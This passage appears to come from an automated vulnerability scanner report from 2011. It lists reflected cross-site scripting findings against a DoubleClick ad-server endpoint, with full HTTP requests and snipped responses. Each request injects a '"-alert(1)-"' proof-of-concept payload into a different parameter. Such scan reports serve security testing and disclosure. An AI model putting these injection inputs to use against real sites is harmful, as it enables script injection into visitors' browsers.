Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8942

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2fl
...[SNIP]...

4.5. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pubICode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b3b5"-alert(1)-"6e28e40048e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http
...[SNIP]...

4.6. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddba6"-alert(1)-"6c8bf62d897 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8941

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
leclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%
...[SNIP]...

4.7. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb197"-alert(1)-"30566853739 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9127

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_im_f_anb_op_ScrFr_pk_300x250%26priorityCode%3D4654900000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

4.8. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [campID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26dad"-alert(1)-"eeefcf6670b was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%
...[SNIP]...

4.9. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [crID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a686a"-alert(1)-"12363754579 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype
...[SNIP]...

4.10. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [partnerID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4ac"-alert(1)-"f286bd5be45 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

